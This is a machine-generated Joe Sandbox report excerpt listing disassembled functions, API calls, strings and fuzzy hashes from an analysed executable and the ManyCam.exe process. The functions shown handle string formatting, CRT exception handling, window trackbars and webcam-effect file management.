Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: Time$System$CurrentFileProcessswprintf
String ID: %u.%03u
API String ID: 7918461-1114938957
Opcode ID: 0339fca6f3e76c0bbacb09d0089dfae5a3832e89d900cb471cb2f837f4fc2496
Instruction ID: 4626f31539ebe809f2a191adee658eb31e7c7d94cc9adf8d1dfaef5f4c209282
Opcode Fuzzy Hash: 0339fca6f3e76c0bbacb09d0089dfae5a3832e89d900cb471cb2f837f4fc2496
Instruction Fuzzy Hash: 4021D523A1878687E610AB25E8413E96354FB88780F540131FA4DCF79AEE3EE5069749

Function 00007FF6EF6C1884 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

_snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF6EF6C1911

Part of subcall function 00007FF6EF6C6948: WideCharToMultiByte.KERNEL32 ref: 00007FF6EF6C6979

Strings

$%s, xrefs: 00007FF6EF6C18FE
@%s, xrefs: 00007FF6EF6C18F5

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ByteCharMultiWide_snwprintf
String ID: $%s$@%s
API String ID: 2650857296-834177443
Opcode ID: bbb8d02e22d8a129956493a4e00a66c4dddf6103d93e0c354bcf6e5b54040a6b
Instruction ID: 4674cd70ab81d91487ab6b11d43f22a0dec6fbca5b1eefd3e95bf84caa04fe37
Opcode Fuzzy Hash: bbb8d02e22d8a129956493a4e00a66c4dddf6103d93e0c354bcf6e5b54040a6b
Instruction Fuzzy Hash: DB31D123A09A4297EE109F15E4403F92368FB45788F500032EE8D8BBA6DE3EE505E745

Function 00007FF6EF6E2FE8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32 ref: 00007FF6EF6E305A
GetFileType.KERNEL32 ref: 00007FF6EF6E3070

Strings

@, xrefs: 00007FF6EF6E309B

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: FileHandleType
String ID: @
API String ID: 3000768030-2766056989
Opcode ID: 19b25201cd048e3610150cd041767a6cc9c18e2f53e4e5ad94b6b0a54806eae3
Instruction ID: 8158b26eaaa2910b90345233f06f297c4a1acc69f5f9976c7afaf230ecb0899f
Opcode Fuzzy Hash: 19b25201cd048e3610150cd041767a6cc9c18e2f53e4e5ad94b6b0a54806eae3
Instruction Fuzzy Hash: 38219823B0864243EB648B25AC952392B59EB85774F240335D67E877F4CE3BDA81E346

Function 00007FF6EF6D8FC8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6EF6D658A), ref: 00007FF6EF6D900C
RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6EF6D658A), ref: 00007FF6EF6D9052

Strings

csm, xrefs: 00007FF6EF6D903F

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: c2fd1e23ba378c3f0c29f0fef5388ea02fe57b74af0b7d3051705ddd8690358c
Instruction ID: 9c7a5e16b4aa22cd2a8efc6f6f067736898fe26124666330aff010183a876986
Opcode Fuzzy Hash: c2fd1e23ba378c3f0c29f0fef5388ea02fe57b74af0b7d3051705ddd8690358c
Instruction Fuzzy Hash: 27111633618B8183EB209F15F44026977A9FB88B84F284235EA8D47B68EF3ED551CB04

Function 00007FF6EF6C5948 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF6EF6C584B,?,?,?,00007FF6EF6BE25A,?,?,?), ref: 00007FF6EF6C594F
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF6EF6C584B,?,?,?,00007FF6EF6BE25A,?,?,?), ref: 00007FF6EF6C595A

Strings

WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00007FF6EF6C5964

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: ErrorLastObjectSingleWait
String ID: WaitForMultipleObjects error %d, GetLastError %d
API String ID: 1211598281-2248577382
Opcode ID: 4ee0e10abfb07af31fa03507a44e01225ea2c88327e87d6fea58f9efe9c9d896
Instruction ID: 786e76e9b1a26399294f132beb2e54cb6d6b6dae9942a2c62bd56e5da07c9fcb
Opcode Fuzzy Hash: 4ee0e10abfb07af31fa03507a44e01225ea2c88327e87d6fea58f9efe9c9d896
Instruction Fuzzy Hash: 51E01A23E0A90243EA44A731AC827B423166F91330F900731E03DC21E6AF2FA646D70B

Function 00007FF6EF6C24D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,00007FF6EF6C1AC2), ref: 00007FF6EF6C24E3
FindResourceW.KERNEL32(?,?,?,00007FF6EF6C1AC2), ref: 00007FF6EF6C24F9

Strings

RTL, xrefs: 00007FF6EF6C24EF

Memory Dump Source

Source File: 00000000.00000002.1732056932.00007FF6EF6B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6EF6B0000, based on PE: true

Associated: 00000000.00000002.1732042715.00007FF6EF6B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732086847.00007FF6EF6EC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF6FD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF700000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF704000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732187754.00007FF6EF721000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1732244893.00007FF6EF723000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff6ef6b0000_file.jbxd

Similarity

API ID: FindHandleModuleResource
String ID: RTL
API String ID: 3537982541-834975271
Opcode ID: 060aac376ff9500f96b7631082418d81147b30c95d997cfc0faa78073afdc2ec
Instruction ID: 6346e785ece024da65442266aab96284789e2684d775128897fa12fb6ffacef2
Opcode Fuzzy Hash: 060aac376ff9500f96b7631082418d81147b30c95d997cfc0faa78073afdc2ec
Instruction Fuzzy Hash: 0BD05E53F0974683FF198B71AC453B513545F69B41F881438CC5E8A380EF6EE299D71A

Analysis Process: ManyCam.exePID: 5480, Parent PID: 4020COMMON

Non-executed Functions

Function 00BB7920 Relevance: 21.4, APIs: 14, Instructions: 420COMMON

Download Yara Rule

APIs

_CIpow.MSVCR80(?,?,?,?,?,?,?,?,?,00BB3DAF,?,?,00000008,00B9A3F8,00000001), ref: 00BB79BC
_ftol.MSVCR80 ref: 00BB79CD
_CIpow.MSVCR80(?,?,?,?,?,?,?,?,?,?,?,00BB3DAF,?,?,00000008,00B9A3F8), ref: 00BB7A2E
_ftol.MSVCR80 ref: 00BB7A3F
_CIpow.MSVCR80(?,?,?,?,?,?,?,?,?,?,?,?,?,00BB3DAF,?), ref: 00BB7AAE
_ftol.MSVCR80 ref: 00BB7ABF
_CIpow.MSVCR80(?,?,?,?,?,?,?,?,?,?,?,00BB3DAF,?,?,00000008,00B9A3F8), ref: 00BB7C53
_ftol.MSVCR80 ref: 00BB7C5C
_CIpow.MSVCR80 ref: 00BB7D5F
_ftol.MSVCR80 ref: 00BB7D70
_CIpow.MSVCR80 ref: 00BB7E3D
_ftol.MSVCR80 ref: 00BB7E4E
_CIpow.MSVCR80 ref: 00BB7F2D
_ftol.MSVCR80 ref: 00BB7F3E

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Ipow_ftol
String ID:
API String ID: 36068165-0
Opcode ID: 228648f2377b8f0835d99bce623a426c9a0cc1d130142cbc6b2f8ccf6da6a035
Instruction ID: 9f9375579b6620483451be579412111554021df9604049c1d05437851365f932
Opcode Fuzzy Hash: 228648f2377b8f0835d99bce623a426c9a0cc1d130142cbc6b2f8ccf6da6a035
Instruction Fuzzy Hash: 9A027D706487428BD310DF24D8957AAFBF5FFC8300F5149AEE4AA9B261DB70E855CB42

Function 00BDBBB6 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00BDC2BF
_crt_debugger_hook.MSVCR80(00000001), ref: 00BDC2CC
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00BDC2D4
UnhandledExceptionFilter.KERNEL32(00BE29FC), ref: 00BDC2DF
_crt_debugger_hook.MSVCR80(00000001), ref: 00BDC2F0
GetCurrentProcess.KERNEL32(C0000409), ref: 00BDC2FB
TerminateProcess.KERNEL32(00000000), ref: 00BDC302

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled_crt_debugger_hook$CurrentDebuggerPresentTerminate
String ID:
API String ID: 3369434319-0
Opcode ID: 31a740d789ef69da4a448668e309fb411f4ff643b67d9d784aeaa05b1f96b1fb
Instruction ID: 8679256a481723e691cd38c6c0d72c647c53e90032a3884b082742fa6f7b56ee
Opcode Fuzzy Hash: 31a740d789ef69da4a448668e309fb411f4ff643b67d9d784aeaa05b1f96b1fb
Instruction Fuzzy Hash: BC21FFB5801385DFC700DF68ECD5A487FA5FB08310F00445AE9199B3A1EFB0988A8F88

Function 004164A0 Relevance: 6.1, APIs: 4, Instructions: 97filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00416650: FindClose.KERNEL32(55C35DE5,00000000,?,004164B1,00000000,000001E2,-0000012B), ref: 00416686

lstrlenW.KERNEL32(00000000,00000000,000001E2), ref: 004164C4
FindFirstFileW.KERNEL32(00000000,00000104,000000D8,00000104,00000000), ref: 004164F5
GetFullPathNameW.KERNEL32(00000000,00000104,?,00000000), ref: 0041652C
SetLastError.KERNEL32(0000007B), ref: 0041654D

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: Find$CloseErrorFileFirstFullLastNamePathlstrlen
String ID:
API String ID: 333540133-0
Opcode ID: 171f62d7d2e46f7442e9afe65942f367c9dc7a9140c3c81f7060891864299191
Instruction ID: f4e42fcc4f8ec7ae6713741ac17fac935eec9a5453ba0a6ca1ec1d98cf041219
Opcode Fuzzy Hash: 171f62d7d2e46f7442e9afe65942f367c9dc7a9140c3c81f7060891864299191
Instruction Fuzzy Hash: 8E413AB0A00219AFDB00DFA4DC84BEE77B2BF44305F11856AE515AB385C778D984CB98

Function 004B2100 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 104comCOMMON

Download Yara Rule

APIs

Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795

Part of subcall function 00438A10: clock.MSVCR80 ref: 00438AA7
Part of subcall function 00438A10: _DebugHeapAllocator.LIBCPMTD ref: 00438AC5

CoCreateInstance.OLE32(?,00000000,00000001,00571980,00000000,?,?,0056F520,7EC02BB4,?,?,?,?,00000000,005334CC,000000FF), ref: 004B21C6

Strings

CGraphMgr::AddFilterByCLSID name=%s, xrefs: 004B214A

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$CreateInstanceclock
String ID: CGraphMgr::AddFilterByCLSID name=%s
API String ID: 918117742-3942708501
Opcode ID: 80f2d3ddaa8d4aa783709a640ee3d22423abe0e31a3af0e214f939dcddfe5315
Instruction ID: 6627f4356a5c181cec56012d4899b026b21b0b7ca21db5bf76fe668c849b38a9
Opcode Fuzzy Hash: 80f2d3ddaa8d4aa783709a640ee3d22423abe0e31a3af0e214f939dcddfe5315
Instruction Fuzzy Hash: C2411C75900209EFDB08DF98D984BEEB7B4FB08314F10865EE815A7390DB74AA01CB64

Function 00BC8AFD Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2884f95fcdafe70c70ecd4019d7835bcd498a4b6d07c35c5e4d26ae6450e3503
Instruction ID: e55d7fbf39b58b7cd40c08828abb676aef87834b5fc5c75b877ec82b140fc7a0
Opcode Fuzzy Hash: 2884f95fcdafe70c70ecd4019d7835bcd498a4b6d07c35c5e4d26ae6450e3503
Instruction Fuzzy Hash: B941CA71E096564FC318CE29C851576FBE2EFCA204F08C67EE898D7755EA30D8498B80

Function 00B95960 Relevance: 72.1, APIs: 31, Strings: 10, Instructions: 384windowCOMMON

Download Yara Rule

APIs

cvError.CXCORE099(FFFFFF2D,cvCreateTrackbar,Bad trackbar maximal value,.\window_w32.cpp,000004B9), ref: 00B959C7
CreateToolbarEx.COMCTL32(?,40000201,00000001,00000000,00000000,00000000,00000000,00000000,00000010,00000014,00000010,00000010,00000014), ref: 00B95A4B
GetClientRect.USER32(?,?), ref: 00B95A5D
MoveWindow.USER32(?,00000000,00000000,?,0000001E,00000001), ref: 00B95A72
SendMessageA.USER32(?,00000421,00000000,00000000), ref: 00B95A83
ShowWindow.USER32(?,00000005), ref: 00B95A8B
GetWindowLongA.USER32(?,000000FC), ref: 00B95AA0
SetWindowLongA.USER32(?,000000FC,00B95630), ref: 00B95AC3
SetWindowLongA.USER32(?,000000EB,00000000), ref: 00B95ACC
SendMessageA.USER32(?,00000418,00000000,00000000), ref: 00B95ADB
cvError.CXCORE099(000000E5,cvCreateTrackbar,NULL window or trackbar name,.\window_w32.cpp,000004B6), ref: 00B95D9C

Strings

Trackbar%p, xrefs: 00B95BF1
.\window_w32.cpp, xrefs: 00B959B3, 00B95D8B
Bad trackbar maximal value, xrefs: 00B959B8
msctls_trackbar32, xrefs: 00B95C48
cvCreateTrackbar, xrefs: 00B959BD, 00B95D95
@, xrefs: 00B95B62
STATIC, xrefs: 00B95C9D
, xrefs: 00B95B5A
NULL window or trackbar name, xrefs: 00B95D90
Buddy%p, xrefs: 00B95C5A

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Window$Long$ErrorMessageSend$ClientCreateMoveRectShowToolbar
String ID: $.\window_w32.cpp$@$Bad trackbar maximal value$Buddy%p$NULL window or trackbar name$STATIC$Trackbar%p$cvCreateTrackbar$msctls_trackbar32
API String ID: 2803709427-1531181224
Opcode ID: 98192f8386ccd037f8597c62f190d5f55432c19856bf435bf1a3fa6296ae3e04
Instruction ID: cff6f2596079ce48ff09b68c64ea01307c523ecbdb6b8c3de1d9cfde3c376825
Opcode Fuzzy Hash: 98192f8386ccd037f8597c62f190d5f55432c19856bf435bf1a3fa6296ae3e04
Instruction Fuzzy Hash: 31D16DB1644700AFD724DF68CD81F6BF7E5FB88B00F404A1DB68997691EB70E8048BA5

Function 00512040 Relevance: 67.0, APIs: 29, Strings: 9, Instructions: 499memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00416740: _DebugHeapAllocator.LIBCPMTD ref: 00416795

Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB139
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB155
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB171
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1A3
Part of subcall function 004CB0F0: _DebugHeapAllocator.LIBCPMTD ref: 004CB1D6

Part of subcall function 004CB5F0: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 004CB626
Part of subcall function 004CB5F0: _wmkdir.MSVCR80 ref: 004CB633

Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EE68
Part of subcall function 0040EE30: _DebugHeapAllocator.LIBCPMTD ref: 0040EEAA

CreateDirectoryW.KERNEL32(00000000,00000000,?,?,?,00000001,\ManyCam,00000000,00569E94,?,00569E90,?,00569E8C,?,00000000,00000000), ref: 0051221A
_DebugHeapAllocator.LIBCPMTD ref: 0051222B

Part of subcall function 0040EA00: _DebugHeapAllocator.LIBCPMTD ref: 0040EA0E

_DebugHeapAllocator.LIBCPMTD ref: 00512251

Part of subcall function 004167E0: _DebugHeapAllocator.LIBCPMTD ref: 004167EE

Part of subcall function 004CC140: wcscpy_s.MSVCR80 ref: 004CC168
Part of subcall function 004CC140: SHFileOperationW.SHELL32(00000000), ref: 004CC1BD

CreateDirectoryW.KERNEL32(00000000,00000000,?,?,NewEffect,00569EAC,?,00569E90,?,00569E8C,?,00000000,00000000,00000002,7EC02BB4), ref: 00512270
CreateDirectoryW.KERNEL32(00000000,?,?,?,?,00569ED4,640x480,00000000,?,00569E90,?,00569E8C,?,00000000,00000000,00000002), ref: 005122D0
CreateDirectoryW.KERNEL32(00000000,?,?,?,?,00569EE8,352x288,00000000,?,00569E90,?,00569E8C,?,00000000,00000000,00000002), ref: 0051234A
??0CxImage@@QAE@K@Z.CXIMAGECRT(00000000,?,00569E90,?,00569E8C,?,00000000,00000000,00000002,7EC02BB4), ref: 00512372
?SetFrame@CxImage@@QAEXJ@Z.CXIMAGECRT(00000000,00000000,?,00569E90,?,00569E8C,?,00000000,00000000,00000002,7EC02BB4), ref: 00512383
?SetRetreiveAllFrames@CxImage@@QAEX_N@Z.CXIMAGECRT(00000001,00000000,00000000,?,00569E90,?,00569E8C,?,00000000,00000000,00000002,7EC02BB4), ref: 00512390
?Load@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000000,00000001,00000000,00000000,?,00569E90,?,00569E8C,?,00000000,00000000,00000002,7EC02BB4), ref: 005123A6
~_Mpunct.LIBCPMTD ref: 005123C8

Part of subcall function 004166C0: ?DestroyFrames@CxImage@@QAE_NXZ.CXIMAGECRT(?,?,0050679A,You have selected an image with the dimension larger than 3000x2000.,00000000,00000000), ref: 004166D3
Part of subcall function 004166C0: ?Destroy@CxImage@@QAE_NXZ.CXIMAGECRT(?,?,0050679A,You have selected an image with the dimension larger than 3000x2000.,00000000,00000000), ref: 004166DB

?GetNumFrames@CxImage@@QBEJXZ.CXIMAGECRT(00000000,00000000,00000001,00000000,00000000,?,00569E90,?,00569E8C,?,00000000,00000000,00000002,7EC02BB4), ref: 005123F6
?GetNumFrames@CxImage@@QBEJXZ.CXIMAGECRT(?,?,?,?,00569F04,preview.jpg,00000000,00000000,00000001,00000000,00000000,?,00569E90,?,00569E8C), ref: 00512474
?SetFrame@CxImage@@QAEXJ@Z.CXIMAGECRT(00000000,00000000,00000002,7EC02BB4), ref: 005124F5
?Load@CxImage@@QAE_NPB_WK@Z.CXIMAGECRT(00000000,00000000,00000000,00000000,00000002,7EC02BB4), ref: 0051250B
?GetFrameDelay@CxImage@@QBEKXZ.CXIMAGECRT(00000000,00000000,00000000,00000000,00000002,7EC02BB4), ref: 00512516
?GetHeight@CxImage@@QBEKXZ.CXIMAGECRT(?,?,?,00000000,?,?,?,?,?,00569F04,preview.jpg,00000000,00000000,00000001,00000000,00000000), ref: 005125AD
?GetWidth@CxImage@@QBEKXZ.CXIMAGECRT(00000000,?,?,?,00000000,?,?,?,?,?,00569F04,preview.jpg,00000000,00000000,00000001,00000000), ref: 005125B6

Strings

.mce, xrefs: 005127C2
preview.jpg, xrefs: 00512412
blocked=0type_id=%dcategory_name=%screator_info=preview=%s, xrefs: 005126FA
640x480, xrefs: 00512278
352x288, xrefs: 005122F2
NewEffect, xrefs: 00512230
\ManyCam, xrefs: 005121C1
InternalProperties, xrefs: 00512657
preview.jpg, xrefs: 005126EC

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

